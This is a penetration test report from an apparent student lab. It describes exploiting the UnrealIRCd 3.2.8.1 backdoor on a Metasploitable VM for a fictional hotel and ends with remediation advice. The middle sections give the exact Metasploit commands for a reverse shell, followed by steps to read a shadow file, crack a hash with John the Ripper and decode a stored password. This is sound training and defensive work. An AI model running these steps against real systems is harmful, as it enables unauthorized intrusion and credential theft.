Penetration Test Demo
-
This project was carried out to reproduce the inner workings of penetration testing and cyber red teaming. A demonstration video and report were created to highlight the existing vulnerabilities and their potential impact on the fictional company, Hotel Dorsey. This was shown through exploiting port 6667.
-
The tools deployed in this project include:
Zenmap
Metasploit
Jack the Ripper
-
A Kali Linux VM serves as the attack machine and Metaploitable acted as the victim machine
Zenmap was used to uncover ports that were potentially vulnerable
An UnrealIRCd backdoor trojan vulnerability on Port 6667 was employed to gain access to the system via Metasploit within the scope
System passwords were found and decrypted using John the Ripper and data was exfiltrated to show the ease with which threat actors could access sensitive information
Remediation was suggested in the form of MFA, patch management, closing of unused ports, RBAC, access management, monitoring, and the preparation of an incident response plan
-
Pentesting is crucial in its attempt to alert companies to vulnerabilities and mitigate incidents
It can take one breach to cause insurmountable damage to privacy and reputation
It is important to keep systems updated and store passwords in a secure place
Penetration Test Report
Pen Test Report
Introduction
At the request of Hotel Dorsey’s upper-level management, our team at Haverbrook Security Lab performed a full penetration test of the network. This was characterized by the salience of providing a practical application to foreground the severity of vulnerabilities and their potential impact on the establishment’s reputation and revenue. The aim was to demonstrate how attackers might be able to infiltrate the network and access sensitive information, such as credentials, by using these weaknesses as entrances. With that said, it was explicitly stated that the scope of the test should be guided by adherence to industry standards. Permission was given to exploit a specific vulnerability to engender credential harvesting and data exfiltration on the target Metasploitable machine, i.e., Hotel Dorsey’s system, using an attack machine, which in this case was Kali Linux. Kali is an operating system tailored to meet the needs of penetration testing, digital forensics, and other associated procedures. As a result, it is equipped with tools vital to this particular penetration test, including Zenmap, Metasploit, and John the Ripper. Zenmap is the graphical user interface of Nmap, a port scanner used for the enumeration of services and host discovery. Metasploit is a pentesting framework employed to assess vulnerabilities and carry out exploits, and John the Ripper is a tool that facilitates password cracking. [11]
To further ensure that testing remained within the parameters of the scope, every step of the process was thoroughly documented. Screenshots were taken with timestamps and dates included to show how connectivity was established between the attack machine and the victim. Additionally, only the two approved IP addresses of each system were utilized, and only the target port 6667 and the listener port 4444 were used to gain remote access to the target. All these methods worked to accomplish the exploitation of the victim according to the scope. Consequently, in its entirety, this oeuvre will provide a detailed analysis as it relates to what was tested, what was used to do the testing, what was uncovered, as well as how to possibly remediate the risks found to prevent exploitation.
Target
Regarding the target of the exploit, its hostname is umgc-metasploitable, and its IP address is 10.7.5.100. This knowledge enabled a connection with the attack machine, kali-umgc, with the IP address 10.7.5.50. Noting these addresses is necessary since it underscores the scope, highlights the points of entry, validates the penetration test, and supports audit compliance. This provides clarity as to the source of the artifacts to be harvested and exfiltrated. To probe the host for open ports or entry points through which attackers might enter, Zenmap was implemented. Upon scanning for open ports, the following ports were found:
After considering the extent to which the vulnerabilities found on each port in the System Scan Report may affect Hotel Dorsey’s stock prices and public image, it is recommended that additional staff be hired, specifically a network engineer and a database administrator. Despite the competitive salaries and benefits that the company would have to offer these professionals, the investment is worth it because of the expertise they would bring, thereby minimizing security risks that would persist otherwise. A database administrator (DBA) is typically in charge of verifying accurate data storage and retrieval, in addition to being concerned with database maintenance, security, and operation. [4] On the other hand, a network engineer designs and builds networks, actively seeks to enhance infrastructure, and keeps track of network performance to remedy any issues that may arise. [2]
Vulnerability
The urgent call for industry experts has gone beyond the bounds of theoretical misconfigurations, code injection, denial of service, and cross-site scripting vulnerabilities, among others that were previously revealed. These weaknesses are real-life threats that require immediate attention. To embrace a pragmatic approach, I consensually exploited Hotel Dorsey’s network using a vulnerability detected on port 6667, which uses the version UnrealIRCd, an IRC daemon (background process). According to CVE-2010-2075, some mirror sites on systems that use the version UnrealIRCd 3.2.8.1, issued between November 2009 and June 2010, were remotely replaced with a backdoor Trojan Horse that was camouflaged as a log/debug macro called DEBUG3_DOLOG_SYSTEM. [10] In reality, it was a malicious system() call inserted into the source code. [9] It allows a remote attacker to bypass authentication, avoid detection, and gain the privileges of the user running the ircd service. [7] In essence, they become capable of executing arbitrary commands.
To exploit the system using this vulnerability, I started by running Metasploit. From there, I searched for exploits for port 6667 using the command search UnrealIRCd. I then copied the exploit I found and typed use exploit/unix/irc/unreal_ircd_3281_backdoor. Following that, I set the RHOST, which is the IP address of the target machine, by entering set RHOST 10.7.5.100, after which I checked the options given using the command show options to verify that the target port was 6667 and the RHOST configuration was successful. Proceeding this, I set the payload, which is the code that is employed after an exploit is able to execute code to perform tasks. I did that by running set PAYLOAD cmd/unix/reverse. After this, I set the LHOST, the attack machine’s IP used to create a reverse shell connection with the victim, by using set LHOST 10.7.5.50. I ran show options again and saw that everything was applied accordingly, including the LPORT 4444, which is the port on the attack machine where the IRC service accepted incoming traffic. Lastly, I ran the exploit command and opened a session to run commands and obtain the target’s assets.
Data Exfiltration
In terms of data exfiltration, it is defined as the act of unobtrusively and strategically stealing data. [8] This process is only possible if a data breach or leak takes place, as was shown with the use of the UnrealIRCd backdoor, and yet not all breaches or leaks result in exfiltration. [8] To harvest credentials and exfiltrate data from the company’s network, I executed a series of commands in the following order:
ls / : To view all the directories
cd /redteamlookhere: To change to this directory
ls: To view its contents
cat shadow: To show the contents of shadow. The /redteamlookhere directory contained shadow, which presented a plethora of hashes, including redteam7student5, which was the intended string.
leafpad hash7_5.txt: In another terminal window, this was used to create a file with the mentioned name to store the hash for redteam7student5 after copying it.
john hash7_5.txt: To use the John the Ripper tool to crack the hash in the hash7_5.txt file. After completion, the password of redteam7student5 was shown to be “t3”
cat .john/john.pot: To show all the hashes that were cracked
ls /: To view the directories again
cd /redteam7: To change to this specific directory
ls: To list its contents
cd /redteam7/student5: The /redteam7 directory housed a few constituents like student5. So, this command was used to change to that directory.
ls: Presents a sensitive file called mypass.txt
cat mypass.txt: To view what it contains. It displayed a base64 string that appeared interesting.
leafpad string7_5.txt: To create a file by that name to save the copied string and steal it from the network
base64 -d string7_5.txt: To decrypt the string and access the password, which was “redteam7student5”
All the passwords were stolen from the network and decrypted with alarming ease. This emphasizes the magnitude of the repercussions the organization will incur if a threat actor manages to exploit the existing vulnerabilities at any given time. Specifically, proprietary data loss may cost the company many setbacks outside of finance. Proprietary data relates to, but is not limited to, Hotel Dorsey’s confidential marketing strategies, client lists, trade secrets, product development, schematics, and computer programs. [1] The exfiltration and exposure of this data may attract more attackers to take advantage of the exfiltrated data, give rise to regulatory fines due to failure to uphold data protection laws, cause competitors to gain an edge through corporate espionage or otherwise, and prompt reputation erosion with consumers and partners choosing to do business with “safer” companies. [6] Furthermore, remediation may lead to a profusion of fees resulting from potential lawsuits, expensive legal battles to safeguard leaked intellectual property, in addition to revenue depletion from operational disruptions that may last up to several months or years. [6]
Recommendations
Concerning recommendations for the backdoor vulnerability on port 6667, it is crucial that the affected UnrealIRCd 3.2.8.1 version is uninstalled, followed by killing all active ircd sessions, and checking for any remaining backdoor activity. [3] The next step would be to install the latest version from a trusted source. Moreover, if the port is not being used, it is suggested that it be closed to eradicate an unnecessary entry point. Also, since the credentials were easily found, use stronger passwords, such as passphrases, and store them in a more secure location, with access policies in place to enforce periodic changes.
To improve the company's overall security posture, it is crucial to adopt best practices to prevent problems before they arise. Therefore, security audits should be performed regularly, awareness training should be deployed for all employees, intrusion detection and prevention systems (IDPSs) and antimalware should be employed, and firewalls need to be added to block incoming threats. [7] Additionally, other measures include hardening system security by implementing identity and access management (IAM) systems that include role-based access control (RBAC) and multi-factor authentication (MFA). [8] On top of that, it is necessary to ensure patch management, remove inessential software, close other unneeded services, perform consistent log and traffic monitoring, and make use of data loss prevention (DLP) tools to impede data exfiltration attempts. [8] Finally, considering all the threats at play, it is imperative that a well-defined incident response plan is developed in the event a breach occurs. [6] With these tactics in place, the management of Hotel Dorsey will be on their way to showcasing that they value their security, and that of their customers and shareholders.
References
[1] CSRC, “Proprietary Information (PROPIN),” CSRC, https://csrc.nist.gov/glossary/term/proprietary_information(accessed Dec. 3, 2025).
[2] Cisco, “Network Engineer,” Cisco, https:/www.cisco.com/site/us/en/learn/training-certifications/tech-roles/network-engineer.html (accessed Dec. 3, 2025).
[3] M. Ampofo, “Penetration Testing: Exploiting Vulnerability With Metasploit,” Medium, https://medium.com/@micaiah_Ampofo/metasploit-exploiting-vulnerability-with-metasploit-b098dce19cbb(accessed Dec. 4, 2025).
[4] Oracle, “What is a Database Administrator (DBA)?,” Oracle, https://www.oracle.com/database/what-is-a-dba/(accessed Dec. 3, 2025).
[5] Rapid7 Docs, “Metasploitable 2 Exploitability Guide,” Rapid7 Docs, https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/ (accessed Dec. 4, 2025).
[6] R. Smith, “The Business Implications of Cyber Security Breaches,” Harvey Norman Technology for Business, https://www.harveynormanbusiness.com.au/blogs/blog/business-implications-cyber-security-breaches(accessed Dec. 3, 2025).
[7] B. Lenaerts-Bergmans, “What is a Backdoor Attack?,” CrowdStrike, https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/backdoor-attack/(accessed Dec. 3, 2025).
[8] IBM, “What is Data Exfiltration?,” IBM, https://www.ibm.com/think/topics/data-exfiltration (accessed Dec. 3, 2025).
[9] J. Bressers, “CVE request: UNREALIRCD 3.2.8.1 source code contained a backdoor allowing for remote command execution,” Openwall, https://www.openwall.com/lists/oss-security/2010/06/14/11 (accessed Dec. 3, 2025).
[10] CVE, “CVE-2010-2075,” CVE, https://www.cve.org/CVERecord?id=CVE-2010-2075(accessed Dec. 3, 2025).
[11] EC-Council, “35+ Top Pentesting & AI Pentesting Tools for Cybersecurity in 2025: EC-Council,” Cybersecurity Exchange, https://www.eccouncil.org/cybersecurity-exchange/penetration-testing/35-pentesting-tools-and-ai-pentesting-tools-for-cybersecurity-in-2025/ (accessed Dec. 4, 2025).